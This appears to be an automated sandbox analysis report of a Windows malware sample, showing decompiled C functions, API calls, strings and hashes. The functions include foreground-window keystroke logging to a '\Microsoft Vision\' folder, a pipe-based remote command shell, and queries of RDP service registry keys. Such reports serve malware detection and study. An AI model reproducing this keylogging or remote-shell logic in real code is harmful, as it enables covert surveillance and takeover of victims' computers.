Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2

TranslateMessage.USER32(?), ref: 00408996
DispatchMessageA.USER32 ref: 004089A1

Strings

SetWindowsHookExA, xrefs: 00408962
c:\windows\system32\user32.dll, xrefs: 0040894A
\Microsoft Vision\, xrefs: 004088A8
%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 004088E3

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Message$CloseCreateHandlelstrcat$AllocChangeDispatchFindFolderLocalModuleNotificationPathReadSizeTimeTranslateVirtuallstrcmpwsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
API String ID: 1641748825-3884914687
Opcode ID: cdd8665faf821fc7c716b17963ecf05a9d3b567e2072f8b5aec4a5efd5c3c78c
Instruction ID: bcb2bfc3d6f08f0c6dbbce81191954197df52cc67be7935f17862baf64c08a83
Opcode Fuzzy Hash: cdd8665faf821fc7c716b17963ecf05a9d3b567e2072f8b5aec4a5efd5c3c78c
Instruction Fuzzy Hash: CF41A3B1500200ABD710EBAAEC49EAB77ECFBC9704F00492EF589E3191DA79D954C779

Uniqueness

Uniqueness Score: -1.00%

Function 00408E66, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E66(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E00401052( &_v536, 0, 0x208);
				_v8 = 0;
				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E004032FF( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E004035E5( &_v12,  &_v536);
					E00403335(E0040346A( &_v8, _t94, _t106, "{"), _t106, _t73);
					E0040346A(_t74, _t94, _t106, "}");
					L00405EA5(_v12);
					_v12 = 0;
				}
				_t37 =  *0x4196a0; // 0x0
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x4196a0; // 0x0
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x4196a0; // 0x0
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t70 = E00403248( &_v8, E004035E5( &_v12, _t40 + 0x210));
					L00405EA5(_v12);
					_t40 =  *0x4196a0; // 0x0
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x4196a0; // 0x0
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x8
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x4196a0; // 0x0
					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
					_t57 =  *0x4196a0; // 0x0
					_t59 = E00403261( &_v8);
					_t61 =  *0x4196a0; // 0x0
					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x4196a0; // 0x0
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x4196a0; // 0x0
					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x4196a0; // 0x0
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x8
				_t46 = lstrlenW(_t97);
				_t48 =  *0x4196a0; // 0x0
				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x4196a0; // 0x0
				CloseHandle( *(_t50 + 4));
				return L00405EA5(_v8);
			}

0x00408e66
0x00408e79
0x00408e84
0x00408e8c
0x00408ea2
0x00408ea8
0x00408eaa
0x00408ef5
0x00408eac
0x00408eb6
0x00408ecf
0x00408edb
0x00408ee3
0x00408ee8
0x00408ee8
0x00408efa
0x00408f0b
0x00408f0f
0x00408f14
0x00408f4f
0x00408f52
0x00408f52
0x00408f58
0x00408f5e
0x00408f63
0x00408f16
0x00408f28
0x00408f32
0x00408f37
0x00408f3c
0x00408f41
0x00000000
0x00408f43
0x00408f43
0x00408f43
0x00408f41
0x00408f79
0x00408f7f
0x00408f91
0x00408f94
0x00408f98
0x00408f9b
0x00408fa2
0x00408fa5
0x00408fae
0x00408fb0
0x00408fc1
0x00408fc9
0x00408fd2
0x00408fd4
0x00408fd9
0x00408fe5
0x00408fe8
0x00408ff1
0x00408ff3
0x00408ff3
0x00408ff9
0x00408ffc
0x00409003
0x00409008
0x00409011
0x00409013
0x0040901b
0x0040902d

APIs

GetForegroundWindow.USER32(?,?,?), ref: 00408E8F
GetWindowTextW.USER32 ref: 00408EA2
lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408F0B
lstrcpyW.KERNEL32 ref: 00408F58
CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 00408F79
lstrlenW.KERNEL32(00414AD0,00000008,00000000,?,?), ref: 00408FA2
WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FAE
WriteFile.KERNEL32(?,?,00000000,-00000008,00000000,?,?), ref: 00408FD2
lstrlenW.KERNEL32(00414AD0,-00000008,00000000,?,?), ref: 00408FE5
WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FF1
lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00409003
WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00409011
CloseHandle.KERNEL32(?,?,?), ref: 0040901B

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,74B60770), ref: 00403365

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Strings

{Unknown}, xrefs: 00408EED

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$File$Write$Window$CloseCreateDispatcherExceptionForegroundFreeHandleTextUserVirtuallstrcatlstrcpy
String ID: {Unknown}
API String ID: 4210971544-4054869793
Opcode ID: 55b58287193b2fc756a43c91aa1732bb71b9c1c2a1b0e47a65978bec53c81d84
Instruction ID: 48c8d0e1ccd5ade84659c98120638cea8da37cb0c086f8587c48bb6223624dfa
Opcode Fuzzy Hash: 55b58287193b2fc756a43c91aa1732bb71b9c1c2a1b0e47a65978bec53c81d84
Instruction Fuzzy Hash: B4519271A00104AFDB00EF65DC99FDA7BA8EF44344F0580B9F509A72A1DB75AE50CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAFB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 135
pipethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EAFB(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E0040EA89(0x419558);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E0040EC8C( &_v12);
					E0040EC8C( &_v8);
					E0040EC8C( &_v16);
					E0040EC8C( &_v20);
					E0040EC8C( &_v24);
					E0040EA89(0x419558);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x419560, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x419564, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E0040EC8C( &_v12);
								E0040EC8C( &_v20);
								E0040362D(_t95,  &_a4);
								if(E0040E891(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E0040EC8C( &_v8);
									E0040EC8C( &_v24);
									E0040EC8C( &_v16);
									 *0x419568 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E0040E92A, ",mA", 0, 0x419570);
									 *0x41956c = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				L00405EA5(_a4);
				return _t94;
			}

0x0040eb09
0x0040eb0e
0x0040eb15
0x0040eb1b
0x0040eb1f
0x0040eb20
0x0040eb24
0x0040eb28
0x0040eb32
0x0040eb3d
0x0040eb49
0x0040ec47
0x0040ec4a
0x0040ec52
0x0040ec5a
0x0040ec62
0x0040ec6a
0x0040ec74
0x0040ec79
0x0040eb4f
0x0040eb5e
0x0040eb71
0x00000000
0x0040eb93
0x0040eb9e
0x0040ebab
0x00000000
0x0040ebb1
0x0040ebbc
0x0040ebc5
0x0040ebc7
0x0040ebc9
0x00000000
0x0040ebcb
0x0040ebce
0x0040ebd6
0x0040ebeb
0x0040ebf7
0x00000000
0x0040ebf9
0x0040ebfc
0x0040ec04
0x0040ec0c
0x0040ec33
0x0040ec38
0x0040ec3e
0x0040ec45
0x00000000
0x00000000
0x0040ec45
0x0040ebf7
0x0040ebc9
0x0040ebab
0x0040eb71
0x0040ec7e
0x0040ec89

APIs

Part of subcall function 0040EA89: GetCurrentThreadId.KERNEL32 ref: 0040EA95
Part of subcall function 0040EA89: SetEvent.KERNEL32(00000000), ref: 0040EAA9
Part of subcall function 0040EA89: WaitForSingleObject.KERNEL32(?,00001388), ref: 0040EAB6
Part of subcall function 0040EA89: TerminateThread.KERNEL32(?,000000FE), ref: 0040EAC7

CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0040EB41
GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0040EB5E
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EB64
DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0040EB6D
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0040EB85
GetCurrentProcess.KERNEL32(00419560,00000000,00000000,00000002,?,00000000), ref: 0040EB9E
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EBA4
DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0040EBA7
GetCurrentProcess.KERNEL32(00419564,00000000,00000000,00000002,?,00000000), ref: 0040EBBC
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EBC2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040EC18
CreateThread.KERNEL32 ref: 0040EC38
DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0040EBC5

Part of subcall function 0040EC8C: CloseHandle.KERNEL32(?,,mA,0040EADC,?,00000000,00402A8C,00000000,exit,00000000,start), ref: 0040EC96

Part of subcall function 0040362D: lstrcpyW.KERNEL32 ref: 00403657

Part of subcall function 0040E891: CreateProcessW.KERNEL32 ref: 0040E8E3

Strings

,mA, xrefs: 0040EB04, 0040EC25, 0040EC6F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
String ID: ,mA
API String ID: 337272696-530449018
Opcode ID: 0f01ebd0b87c0f43eda10477de1eaee23ef7775f6ac6b830494366ece72db7de
Instruction ID: 133df40998d99ecd2617a4aa81dd542fac3e70f3ef78a3e4fdcb16f339e728fe
Opcode Fuzzy Hash: 0f01ebd0b87c0f43eda10477de1eaee23ef7775f6ac6b830494366ece72db7de
Instruction Fuzzy Hash: 5A418471900209BAFB14EBA2CE56FEFBB78AF44745F10443BF501B20D1DB789A15CA69

Uniqueness

Uniqueness Score: -1.00%

Function 04692C00, Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 366COMMON

Download Yara Rule

Strings

%02d, xrefs: 04692D9B, 04692DFE, 04692EB5, 04692F22, 04692F44
%03d, xrefs: 04692EDA
%04d, xrefs: 04692FDD
%lld, xrefs: 04692F84
%.16g, xrefs: 04692F0E
W, xrefs: 04692E69
%06.3f, xrefs: 04692DD6

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2102423945-1989508764
Opcode ID: ec2bdd2dc1e8b89e6cbec3ba3c742a4c299532db763b9f95f99987e11824db0b
Instruction ID: 19909f09bfecb1e8a268e6b872e4578a35b8f1980a6221881bd4794fd1defe54
Opcode Fuzzy Hash: ec2bdd2dc1e8b89e6cbec3ba3c742a4c299532db763b9f95f99987e11824db0b
Instruction Fuzzy Hash: A0C137B1A08301FBEB10DE14DC81B2A77E9EF85708F04099DF9865B381F6B0BD418B96

Uniqueness

Uniqueness Score: -1.00%

Function 046980B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 299fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04698144
UnlockFileEx.KERNEL32 ref: 04698371
GetLastError.KERNEL32 ref: 0469837B

Strings

%s-shm, xrefs: 04698159
cannot open file at line %d of [%.10s], xrefs: 04698233
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04698229

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ErrorFileLastUnlock_memset
String ID: %s-shm$cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 4009513553-3592428516
Opcode ID: 16c3ee86536c8739e29aa5e8e10a473ef71ea0817f8a8742c4641e34f8f51e1c
Instruction ID: 482a78f7fbf1355d3e9833527de29ec9d63de70c243923532e74b6bfc021a95a
Opcode Fuzzy Hash: 16c3ee86536c8739e29aa5e8e10a473ef71ea0817f8a8742c4641e34f8f51e1c
Instruction Fuzzy Hash: 08B18BB0614301AFEB50EF28D845B6777E8EB48718F04892DE849D7381FBB4F9448B92

Uniqueness

Uniqueness Score: -1.00%

Function 04699340, Relevance: 21.1, APIs: 14, Instructions: 140COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?,00000000,?,?), ref: 0469938B

Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,0469908D,00000000,00000000,74E5F560), ref: 04697770
Part of subcall function 04697760: _malloc.LIBCMT ref: 0469777C
Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04697796
Part of subcall function 04697760: _free.LIBCMT ref: 046977A1

GetVersionExW.KERNEL32(?,00000000,?,?), ref: 046993CC
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 046993EC
_malloc.LIBCMT ref: 046993F9
_free.LIBCMT ref: 04699408
GetFullPathNameW.KERNEL32(00000000,00000003,00000000,00000000), ref: 0469942B
_free.LIBCMT ref: 04699432

Part of subcall function 046F6401: HeapFree.KERNEL32(00000000,00000000,?,046F8196,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6417
Part of subcall function 046F6401: GetLastError.KERNEL32(00000000,?,046F8196,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257,00000008), ref: 046F6429

Part of subcall function 04697620: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,04699488), ref: 04697634
Part of subcall function 04697620: _malloc.LIBCMT ref: 0469763D

GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 04699444
_malloc.LIBCMT ref: 0469944E
GetFullPathNameA.KERNEL32(00000000,00000003,00000000,00000000), ref: 04699461
_free.LIBCMT ref: 04699468
_free.LIBCMT ref: 04699494
_free.LIBCMT ref: 046994C1

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _free$FullNamePath_malloc$ByteCharMultiWide$Version$ErrorFreeHeapLast
String ID:
API String ID: 3556260241-0
Opcode ID: 1923ce00dc80cd1fa74795216c04a409a418cdb10975e7f67fe06bfd35d05fe7
Instruction ID: 4d5b7dcda87106742ef2081b19897dd8d7a1510c02d7fee746121789622b585d
Opcode Fuzzy Hash: 1923ce00dc80cd1fa74795216c04a409a418cdb10975e7f67fe06bfd35d05fe7
Instruction Fuzzy Hash: 6641B9B1A01214ABDB21AF65DC45BAE73E8EF58718F00446CE90997340FB74BE468BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D58D, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D58D(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E00405EFF(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E00401099(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}

0x0040d59d
0x0040d5a0
0x0040d5a6
0x0040d5aa
0x0040d5bf
0x0040d5c3
0x0040d5dd
0x0040d5f2
0x0040d5fb
0x0040d608
0x0040d624
0x0040d627
0x0040d62c
0x0040d632
0x00000000
0x00000000
0x00000000
0x0040d60a
0x0040d60a
0x0040d611
0x0040d614
0x00000000
0x0040d614
0x0040d5c5
0x0040d5c6
0x0040d616
0x0040d616
0x0040d616
0x0040d634
0x0040d638

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D5A0
OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D5B9
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D5C6
QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D5D5
GetLastError.KERNEL32 ref: 0040D5DF
QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D600
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D611
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D614
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D624
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D627

Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00411E18,00000000,00000000,00000000,00000000,h\HA,00000000), ref: 0040109F
Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6

Strings

ServicesActive, xrefs: 0040D597

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
String ID: ServicesActive
API String ID: 1929760286-3071072050
Opcode ID: 988a247054cbab642579a7990b6c39b941216f8cb3b3a6a4e112f645155d845c
Instruction ID: ebb33121c736b37e022c412f83ca8b13b1641e7c3b3b3a4d2b3b8dbfd97acc73
Opcode Fuzzy Hash: 988a247054cbab642579a7990b6c39b941216f8cb3b3a6a4e112f645155d845c
Instruction Fuzzy Hash: 6D119D71900218BBCB109BA2DD48D9F7FADEFC97547114036FA06E3290DB389E01CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCB2, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DCB2(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E004035E5( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E004035E5( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E00410FC3(_t96, E004035E5( &_v16, L"ImagePath"),  &_v36);
					L00405EA5(_v16);
					E00410FAE( &_v8);
					if(_t50 != 0) {
						E00402ECF( &_v36,  &_v12);
						L00402FC3( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E00410FC3(_t96, E004035E5( &_v16, L"ServiceDll"),  &_v36);
								L00405EA5(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E00403437(_t72 + 0x20, E004031D4( &_v16, E00402ECF( &_v36,  &_v28), _t107));
									L00405EA5(_v16);
									_v16 = _v16 & 0x00000000;
									L00405EA5(_v28);
								}
								E00410FAE( &_v8);
							}
						}
						L00405EA5(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E00403036( &_v36);
				L00405EA5(_v20);
				L00405EA5(_v24);
				return E00410FAE( &_v8);
			}

0x0040dcb2
0x0040dcba
0x0040dcc6
0x0040dcc9
0x0040dcd6
0x0040dcde
0x0040dceb
0x0040dcfb
0x0040dd16
0x0040dd20
0x0040dd28
0x0040dd2f
0x0040dd3c
0x0040dd44
0x0040dd5b
0x0040dd8a
0x0040dda1
0x0040ddab
0x0040ddb0
0x0040ddb2
0x0040ddce
0x0040ddd6
0x0040ddde
0x0040dde2
0x0040dde2
0x0040ddea
0x0040ddea
0x0040dd8a
0x0040ddf2
0x0040ddf7
0x0040ddf7
0x0040dd2f
0x0040ddfe
0x0040de06
0x0040de0e
0x0040de1e

APIs

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0040DCF3

Part of subcall function 00410FC3: RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,00000000,00413589,?,?,?,004115B2,?,?,80000001), ref: 00410FE6
Part of subcall function 00410FC3: RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,004115B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0041100A

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?,?,0041112D,?,?,004136B9), ref: 00410FB8

StrStrW.SHLWAPI(?,svchost.exe,?,00000000,ImagePath,?), ref: 0040DD57
StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DD65
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0040DD82

Strings

svchost.exe -k, xrefs: 0040DD5D
svchost.exe, xrefs: 0040DD4F
ImagePath, xrefs: 0040DD05
ServiceDll, xrefs: 0040DD90
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCE
SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DCBE

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: OpenQueryValuelstrlen$CloseDispatcherExceptionFreeUserVirtual
String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
API String ID: 2553126176-3333427388
Opcode ID: aad9147be311e59986aa814dddcd5916ab18c26773ae1b8a70992e4ca074bfe3
Instruction ID: b0e3efee02fd3b5bcb605f8d25d9eb9ad0325da8f8f16e1407df865518f0ff08
Opcode Fuzzy Hash: aad9147be311e59986aa814dddcd5916ab18c26773ae1b8a70992e4ca074bfe3
Instruction Fuzzy Hash: 6F410C71D00118ABDF14EBE2CD52EEEB738AF14745F10406BA401B21D1EB78AB45CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 04699020, Relevance: 16.6, APIs: 11, Instructions: 127sleepfileCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?,00000000,00000000,74E5F560), ref: 04699068

Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,0469908D,00000000,00000000,74E5F560), ref: 04697770
Part of subcall function 04697760: _malloc.LIBCMT ref: 0469777C
Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04697796
Part of subcall function 04697760: _free.LIBCMT ref: 046977A1

GetVersionExW.KERNEL32(?,00000000,00000000,74E5F560), ref: 046990BD
DeleteFileW.KERNEL32(00000000,00000000,00000000,74E5F560), ref: 046990E1
GetFileAttributesW.KERNEL32(00000000), ref: 046990E4
GetLastError.KERNEL32 ref: 046990F1
Sleep.KERNEL32(00000064), ref: 04699116
DeleteFileA.KERNEL32(00000000,00000000,00000000,74E5F560), ref: 04699125
GetFileAttributesA.KERNEL32(00000000), ref: 04699128
GetLastError.KERNEL32 ref: 04699135
Sleep.KERNEL32(00000064), ref: 0469915A
_free.LIBCMT ref: 04699163

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: File$AttributesByteCharDeleteErrorLastMultiSleepVersionWide_free$_malloc
String ID:
API String ID: 876893172-0
Opcode ID: 398423b2bc288ad574760242401b3cd32358074aba50ca404f47c6346fbc32a0
Instruction ID: f8591fc008b34033e8a7362d88f1ffc62cd5cb64de40f617acbba0818f147947
Opcode Fuzzy Hash: 398423b2bc288ad574760242401b3cd32358074aba50ca404f47c6346fbc32a0
Instruction Fuzzy Hash: D84160B1A01218DBCF24AF74AC8869DB3E8FB48324F1049ADD51AD3340EB786E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 046ABCB0, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 311COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046ABDBC

Part of subcall function 0469D4E0: _memset.LIBCMT ref: 0469D514

Strings

%d of %d pages missing from overflow list starting at %d, xrefs: 046AC018
database corruption at line %d of [%.10s], xrefs: 046ABDD0
2nd reference to page %d, xrefs: 046ABFF0
invalid page number %d, xrefs: 046ABFD6
freelist leaf count too big on page %d, xrefs: 046ABEB6
failed to get page %d, xrefs: 046AC032
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046ABDC6

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
